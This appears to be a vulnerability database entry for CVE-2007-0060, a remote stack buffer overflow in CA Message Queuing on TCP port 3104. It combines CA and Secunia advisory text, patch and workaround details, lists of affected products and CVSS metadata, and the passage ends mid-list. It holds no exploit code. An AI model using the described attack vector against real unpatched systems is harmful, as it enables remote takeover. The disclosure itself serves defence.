Vulnerability from variot - Updated: 2025-04-10 23:21Stack-based buffer overflow in the Message Queuing Server (Cam.exe) in CA (formerly Computer Associates) Message Queuing (CAM / CAFT) software before 1.11 Build 54_4 on Windows and NetWare, as used in CA Advantage Data Transport, eTrust Admin, certain BrightStor products, certain CleverPath products, and certain Unicenter products, allows remote attackers to execute arbitrary code via a crafted message to TCP port 3104. Multiple Computer Associates products are prone to a remote stack-based buffer-overflow vulnerability. This issue affects the Message Queuing (CAM/CAFT) component. The application fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. A successful exploit will allow an attacker to execute arbitrary code with SYSTEM-level privileges. There is a buffer overflow vulnerability in the CAM service when processing malformed user requests. Remote attackers may use this vulnerability to control the server.
Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. Please see the vendor's advisory for more details.
CAM (Windows): http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO89945
CAM(Netware): http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO89943
PROVIDED AND/OR DISCOVERED BY: IBM ISS X-Force
ORIGINAL ADVISORY: CA: http://supportconnectw.ca.com/public/dto_transportit/infodocs/camsgquevul-secnot.asp
IBM ISS X-Force: http://www.iss.net/threats/272.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
Mitigating Factors: None
Severity: CA has given this vulnerability a High risk rating.
i.e. CAM versions 1.04, 1.05, 1.06, 1.07, 1.10 (prior to Build
54_4) and 1.11 (prior to Build 54_4).
Affected Products: Advantage Data Transport 3.0 BrightStor SAN Manager 11.1, 11.5 BrightStor Portal 11.1 CleverPath OLAP 5.1 CleverPath ECM 3.5 CleverPath Predictive Analysis Server 2.0, 3.0 CleverPath Aion 10.0 eTrust Admin 2.01, 2.04, 2.07, 2.09, 8.0, 8.1 Unicenter Application Performance Monitor 3.0, 3.5 Unicenter Asset Management 3.1, 3.2, 3.2 SP1, 3.2 SP2, 4.0, 4.0 SP1 Unicenter Data Transport Option 2.0 Unicenter Enterprise Job Manager 1.0 SP1, 1.0 SP2 Unicenter Jasmine 3.0 Unicenter Management for WebSphere MQ 3.5 Unicenter Management for Microsoft Exchange 4.0, 4.1 Unicenter Management for Lotus Notes/Domino 4.0 Unicenter Management for Web Servers 5, 5.0.1 Unicenter NSM 3.0, 3.1 Unicenter NSM Wireless Network Management Option 3.0 Unicenter Remote Control 6.0, 6.0 SP1 Unicenter Service Level Management 3.0, 3.0.1, 3.0.2, 3.5 Unicenter Software Delivery 3.0, 3.1, 3.1 SP1, 3.1 SP2, 4.0, 4.0 SP1 Unicenter TNG 2.1, 2.2, 2.4, 2.4.2 Unicenter TNG JPN 2.2
Affected Platforms: Windows and NetWare
Platforms NOT affected: AIX, AS/400, DG Intel, DG Motorola, DYNIX, HP-UX, IRIX, Linux Intel, Linux s/390, MVS, Open VMS, OS/2, OSF1, Solaris Intel, Solaris Sparc and UnixWare.
Status and Recommendation:
CA has made patches available for all affected products. These
patches are independent of the CA Software that installed CAM.
Simply select the patch appropriate to the platform, and the
installed version of CAM, and follow the patch application
instructions. You should also review the product home pages on
SupportConnect for any additional product specific instructions.
Solutions for CAM: Platform Solution Windows QO89945 NetWare QO89943
How to determine if you are affected:
Determining CAM versions: Simply running camstat will return the version information in the top line of the output on any platform. The camstat command is located in the bin subfolder of the installation directory.
The example below indicates that CAM version 1.11 build 27 increment 2 is running.
E:>camstat CAM – machine.ca.com Version 1.11 (Build 27_2) up 0 days 1:16
Determining the CAM install directory:
Windows: The install location is specified by the %CAI_MSQ% environment variable. Unix/Linux/Mac: The /etc/catngcampath text file holds the CAM install location.
Workaround: The affected listening port can be disabled by creating or updating CAM's configuration file, CAM.CFG, with the following entry under the "*CONFIG" section:
*CONFIG cas_port=0
The CA Messaging Server must be recycled in order for this to take effect. We advise that products dependent upon CAM should be shutdown prior to recycling CAM. Once dependent products have been shutdown, CAM can be recycled with the following commands:
On Windows: camclose cam start
On NetWare: load camclose load cam start
Once CAM has been restarted, any CAM dependent products that were shutdown can be restarted.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFGpqCHeSWR3+KUGYURAt6DAJ0YpnaiwrNfhhQlvdvL28LYxBYbZgCfRpKQ pNdOPBvd1/BVRF6Lo65uo2o= =7w0f -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200707-0544",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "2.2"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.1"
},
{
"model": "advantage data transport",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.1"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.2"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.7"
},
{
"model": "cleverpath predictive analysis server",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4"
},
{
"model": "cleverpath aion",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.0"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "5.0.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.4.2"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.1"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "cleverpath olap",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "5.1"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "brightstor portal",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.9"
},
{
"model": "unicenter asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter enterprise job manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "1.0"
},
{
"model": "unicenter remote control",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.0"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "4.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "unicenter jasmine",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.1"
},
{
"model": "unicenter management",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "4.0"
},
{
"model": "unicenter application performance monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "unicenter nsm wireless network management option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust admin",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.4"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter service level management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0.2"
},
{
"model": "unicenter data transport option",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.2"
},
{
"model": "cleverpath ecm",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.5"
},
{
"model": "brightstor san manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "brightstor portal",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "brightstor san manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "advantage data transport",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "cleverpath aion",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "cleverpath ecm",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "cleverpath olap",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "cleverpath predictive analysis server",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust admin",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter application performance monitor",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter asset management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter data transport option",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter enterprise job manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter jasmine",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter nsm wireless network management option",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter remote control",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter service level management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter software delivery",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter tng",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4.2"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.1"
},
{
"model": "unicenter tng",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2.4"
},
{
"model": "unicenter software delivery",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.1"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.4"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter tng",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter software delivery sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.2"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0.1"
},
{
"model": "associates unicenter service level management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter remote control sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter nsm wireless network management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter management for websphere mq",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0.1"
},
{
"model": "associates unicenter management for web servers",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.0"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.1"
},
{
"model": "associates unicenter management for microsoft exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter management for lotus notes/domino",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter jasmine",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter enterprise job manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter enterprise job manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.0"
},
{
"model": "associates unicenter data transport option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "4.0"
},
{
"model": "associates unicenter asset management sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates unicenter application performance monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.09"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.07"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.04"
},
{
"model": "associates etrust admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.01"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates cleverpath predictive analysis server",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates cleverpath olap",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "5.1"
},
{
"model": "associates cleverpath ecm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.5"
},
{
"model": "associates cleverpath aion",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.0"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor san manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor portal",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates advantage data transport",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
}
],
"sources": [
{
"db": "BID",
"id": "25051"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:brightstor_portal",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:brightstor_san_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:advantage_data_transport",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:cleverpath_aion",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:cleverpath_ecm",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:cleverpath_olap",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:cleverpath_predictive_analysis_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_admin",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_application_performance_monitor",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_asset_management",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_data_transport_option",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_enterprise_job_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_jasmine",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_management",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_network_and_systems_management",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_nsm_wireless_network_management_option",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_remote_control",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_service_level_management",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_software_delivery",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:unicenter_tng",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Paul Mehta",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
}
],
"trust": 0.6
},
"cve": "CVE-2007-0060",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2007-0060",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-23422",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-0060",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2007-0060",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200707-429",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-23422",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-23422"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001326"
},
{
"db": "CNNVD",
"id": "CNNVD-200707-429"
},
{
"db": "NVD",
"id": "CVE-2007-0060"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in the Message Queuing Server (Cam.exe) in CA (formerly Computer Associates) Message Queuing (CAM / CAFT) software before 1.11 Build 54_4 on Windows and NetWare, as used in CA Advantage Data Transport, eTrust Admin, certain BrightStor products, certain CleverPath products, and certain Unicenter products, allows remote attackers to execute arbitrary code via a crafted message to TCP port 3104. Multiple Computer Associates products are prone to a remote stack-based buffer-overflow vulnerability. This issue affects the Message Queuing (CAM/CAFT) component. The application fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer. \nA successful exploit will allow an attacker to execute arbitrary code with SYSTEM-level privileges. There is a buffer overflow vulnerability in the CAM service when processing malformed user requests. Remote attackers may use this vulnerability to control the server. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Full Featured Secunia Network Software Inspector (NSI) is now\navailable:\nhttp://secunia.com/network_software_inspector/\n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. Please see\nthe vendor\u0027s advisory for more details. \n\nCAM (Windows):\nhttp://supportconnect.ca.com/sc/redir.jsp?reqPage=search\u0026searchID=QO89945\n\nCAM(Netware):\nhttp://supportconnect.ca.com/sc/redir.jsp?reqPage=search\u0026searchID=QO89943\n\nPROVIDED AND/OR DISCOVERED BY:\nIBM ISS X-Force\n\nORIGINAL ADVISORY:\nCA:\nhttp://supportconnectw.ca.com/public/dto_transportit/infodocs/camsgquevul-secnot.asp\n\nIBM ISS X-Force:\nhttp://www.iss.net/threats/272.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nMitigating Factors: None\n\nSeverity: CA has given this vulnerability a High risk rating. \ni.e. CAM versions 1.04, 1.05, 1.06, 1.07, 1.10 (prior to Build \n54_4) and 1.11 (prior to Build 54_4). \n\nAffected Products:\nAdvantage Data Transport 3.0\nBrightStor SAN Manager 11.1, 11.5\nBrightStor Portal 11.1\nCleverPath OLAP 5.1\nCleverPath ECM 3.5\nCleverPath Predictive Analysis Server 2.0, 3.0\nCleverPath Aion 10.0\neTrust Admin 2.01, 2.04, 2.07, 2.09, 8.0, 8.1\nUnicenter Application Performance Monitor 3.0, 3.5\nUnicenter Asset Management 3.1, 3.2, 3.2 SP1, 3.2 SP2, 4.0, \n 4.0 SP1\nUnicenter Data Transport Option 2.0\nUnicenter Enterprise Job Manager 1.0 SP1, 1.0 SP2\nUnicenter Jasmine 3.0\nUnicenter Management for WebSphere MQ 3.5\nUnicenter Management for Microsoft Exchange 4.0, 4.1\nUnicenter Management for Lotus Notes/Domino 4.0\nUnicenter Management for Web Servers 5, 5.0.1\nUnicenter NSM 3.0, 3.1\nUnicenter NSM Wireless Network Management Option 3.0\nUnicenter Remote Control 6.0, 6.0 SP1\nUnicenter Service Level Management 3.0, 3.0.1, 3.0.2, 3.5\nUnicenter Software Delivery 3.0, 3.1, 3.1 SP1, 3.1 SP2, 4.0, \n 